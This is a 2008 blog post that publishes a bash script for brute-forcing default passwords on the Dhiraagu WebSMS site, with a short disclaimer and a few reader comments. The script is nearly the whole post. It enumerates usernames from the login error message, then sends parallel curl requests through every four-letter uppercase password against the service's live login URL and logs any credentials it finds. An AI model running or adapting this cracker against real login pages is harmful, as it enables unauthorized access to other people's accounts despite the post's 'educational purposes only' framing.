Sep 16, 2008

Bash script: Crack Dhiraagu WebSMS passwords

some time ago I posted an article about how ridiculously insecure the webSMS site was, and how it was relatively simple it was for somebody to write up a bash script to possibly crack the default passwords.

For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)

EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!

#!/bin/bash

cd $HOME/Desktop
mxjobs=15
cont=0

if [ -z ${2} ]
then
cont=1
else
cont=0
fi

echo "checking if username exists"

if [ -n "`curl -s --compressed -d \"username=${1}&password=wroXngo123!@)\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
grep \"password is incorrect\"`" ]
then
echo "User exists. Let's see what happens."
else
echo "That username does not exist."
exit
fi

for a in {A..Z};do for b in {A..Z};do for c in {A..Z};do for d in {A..Z}
do
f="${a}${b}${c}${d}"

if [ $cont -lt 1 ]
then
echo -en "skipping ${a}${b}${c}${d}\r"

if [ "${f}" = "${2}" ]
then
echo
echo "MATCH"
cont=1
fi
continue
fi

ok=0
while [ $ok -lt 1 ]
do
if [ `ps -A | grep curl | wc -l` -lt $mxjobs ]
then
ok=1
fi
done

echo -en "Testing ${f}\r"

if [ -n "`curl -s --compressed -d \"username=${1}&password=${f}\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | grep Dear`" ];then \
echo "Found ${1},${f}" | tee -a foundpasses.txt;killall curl;kill ${$};fi&

done;done;done;done

echo "I guess we didn't find it then"

4 Comments:

Anonymous said...

WOT?

Anonymous said...

which languaje is this 1, java script?

Unknown said...

how to get the web sms password........

Unknown said...

i have gorfot the user name!.....

Post a Comment